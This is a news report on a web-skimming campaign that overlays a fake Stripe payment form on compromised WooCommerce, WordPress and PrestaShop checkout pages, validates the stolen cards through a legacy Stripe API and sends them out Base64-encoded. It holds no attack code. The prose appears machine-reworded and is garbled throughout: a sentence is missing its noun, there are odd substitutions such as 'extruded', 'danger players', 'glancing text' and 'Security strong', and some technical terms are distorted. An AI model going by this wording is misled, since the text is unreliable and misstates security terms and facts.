Threat hunters are alerted to a sophisticated that uses a legacy application programming interface ( API ) from Stripe to validate lost payment information before it is extruded.
According to Jscrambler researchers Pedro Fortuna, David Alves, and Pedro Marrucho,” This instrument ensures that only legitimate card information is sent to the attackers,” the operation is more effective and probably harder to detect.
According to estimates, 49 businesses have been impacted by the battle so far. The harmful script injections have been removed from fifteen of the affected websites. Since at least August 20, 2024, the exercise is thought to have been continued.
Security strong Source Defense initially reported information of the campaign toward the end of February 2025, outlining the internet skimmer’s use of the “api.” stripe [. ] API for the” com/v1/sources” API, which enables applications to accept different payment procedures. Since then, the node has been replaced with the updated PaymentMethods API.
The Browser skimmer, which is intended to catch and conceal the reputable payment form on order checkout pages, provide a replica of the genuine Stripe payment screen, validate it using the sources API, and then transmit it to a remote server in Base64-encoded format, uses harmful domains as the first distribution point.
According to Jscrambler, the danger players behind the procedure are likely to use vulnerabilities and incorrect configurations in WooCommerce, WordPress, and PrestaShop to install the first step text. This load script is used to interpret and release a Base64-encoded next-stage, which also contains the URL to the skimmer’s URL.
The researchers claimed that the glancing text “hides the genuine Stripe frame and overlays it with a malicious one designed to mimic its look.” The” Place Order” option is also cloned, hiding the real one.
Users are prompted to refresh the sites once the details have been provided. Because the script appears to be tailored to each focused site, there is some evidence that the last skimmer payload was created with some sort of tool.
The security firm added that it found skim scripts that appeared to be from Square payment processors, which suggests that the threat actors are good targeting a number of payment service providers. And that’s not all. Additionally, it has been reported that the skimming code incorporates additional payment options using cryptocurrencies like Bitcoin, Ether ( Ethereum ), Tether, and Litecoin.
The researchers said that this powerful web skimming campaign highlights the evolving strategies used by attackers to remain unchecked. Additionally, they properly filter out illegitimate credit card data, making sure that only legitimate credentials are stolen.